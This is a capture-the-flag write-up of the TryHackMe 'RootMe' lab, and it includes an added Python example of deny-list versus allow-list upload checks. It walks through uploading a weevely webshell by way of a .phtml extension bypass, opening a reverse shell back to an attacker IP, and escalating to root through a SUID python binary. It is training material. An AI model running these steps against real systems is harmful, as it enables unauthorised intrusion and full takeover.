RootMe - Write-up - TryHackMe

Information

Room

  • Name: RootMe
  • Profile: tryhackme.com
  • Difficulty: Easy
  • Description: A ctf for beginners, can you root me?

RootMe

Write-up

Overview

Install tools used in this WU on BlackArch Linux:

$ sudo pacman -S nmap ffuf seclists weevely gtfoblookup

Network enumeration

Service scan with nmap:

# Nmap 7.91 scan initiated Fri Mar 19 11:48:02 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.80.74
Nmap scan report for 10.10.80.74
Host is up (0.085s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 19 11:50:31 2021 -- 1 IP address (1 host up) scanned in 149.40 seconds

Web enumeration

Let's find hidden directories:

$ ffuf -u http://10.10.156.75/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v1.3.0-git
________________________________________________

:: Method : GET
:: URL : http://10.10.156.75/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________

uploads [Status: 301, Size: 314, Words: 20, Lines: 10]
panel [Status: 301, Size: 312, Words: 20, Lines: 10]
css [Status: 301, Size: 310, Words: 20, Lines: 10]
js [Status: 301, Size: 309, Words: 20, Lines: 10]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 200, Size: 616, Words: 115, Lines: 26]

There is an upload form at /panel/.

Web exploitation

The file /index.php lets us know that the app is written in PHP.

Uploading a .png image is allowed, but a PHP file (.php) is rejected.

Let's generate a webshell:

$ weevely generate noraj agent.php

We can bypass the upload by using the .phtml extension.

weevely http://10.10.156.75/uploads/agent.phtml noraj

[+] weevely 4.0.1

[+] Target: 10.10.156.75
[+] Session: /home/noraj/.weevely/sessions/10.10.156.75/agent_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
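Why a deny-list on .php is beaten by .phtml, and what an upload check that holds up looks like. This is an added example, not code from the room or from this write-up: the vulnerable function models the panel's behaviour as described above (an assumption about its code, since the source is not shown), and the list of PHP-executable extensions is taken from Debian/Ubuntu's default Apache PHP handler configuration.

```python
import os

# Extensions Debian/Ubuntu's Apache PHP module maps to the PHP handler by
# default (php*.conf: FilesMatch ".+\.ph(ar|p|tml)$"). The room's check only
# names .php, so the other two are executed by the server but never blocked.
PHP_EXECUTABLE_EXTS = {".php", ".phtml", ".phar"}

# Allow-list for the hardened check, plus the magic bytes each type starts with.
ALLOWED_IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif"}
MAGIC_BYTES = {b"\x89PNG\r\n\x1a\n": {".png"},
               b"\xff\xd8\xff": {".jpg", ".jpeg"},
               b"GIF87a": {".gif"}, b"GIF89a": {".gif"}}


def vulnerable_is_allowed(filename: str) -> bool:
    """Deny-list check modelled on the room's panel (assumed): rejects .php only."""
    return os.path.splitext(filename)[1].lower() != ".php"


def hardened_is_allowed(filename: str, content: bytes) -> bool:
    """Allow-list check: plain basename, one extension, image type, matching magic bytes."""
    # Reject path components and double extensions such as shell.png.phtml.
    if os.path.basename(filename) != filename or filename.count(".") != 1:
        return False
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_IMAGE_EXTS:
        return False
    # The declared extension must agree with the bytes actually uploaded.
    return any(content.startswith(m) and ext in exts for m, exts in MAGIC_BYTES.items())


def extensions_that_bypass(check) -> set:
    """Which PHP-executable extensions does a given check let through?"""
    return {ext for ext in PHP_EXECUTABLE_EXTS if check("agent" + ext)}


if __name__ == "__main__":
    print("deny-list lets through:", extensions_that_bypass(vulnerable_is_allowed))
    print("allow-list lets through:",
          extensions_that_bypass(lambda n: hardened_is_allowed(n, b"<?php ")))
    # Defence in depth: even if a check fails, the uploads directory must not
    # execute PHP. With mod_php: <Directory /var/www/html/uploads>
    #                              php_admin_flag engine off
    #                            </Directory>
```

Storing uploads under a server-generated name outside the web root removes the remaining dependency on the user-supplied filename.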

Let's obtain a reverse shell from our web shell:

www-data@rootme:/var/www/html/uploads $ :backdoor_reversetcp 10.9.19.77 9999

On my machine:

$ pwncat -lvv 9999
INFO: Listening on :::9999 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:9999 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.156.75:49816 (family 2/IPv4, TCP)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ find / -type f -name user.txt 2>/dev/null
/var/www/user.txt

$ cat /var/www/user.txt
THM{edited}

System enumeration

Let's find SUID binaries:

$ find / -type f -user root -perm -u=s 2>/dev/null
...
/usr/bin/chsh
/usr/bin/python
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
...

/usr/bin/python should not have the SUID bit set: a SUID interpreter runs any script as root.

We can consult GTFOBins:

$ gtfoblookup linux suid python
python:

suid:

Code: ./python -c 'import os; os.execl("/bin/sh", "sh",
"-p")'

Let's get our privileged shell:

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

cat /root/root.txt
THM{edited}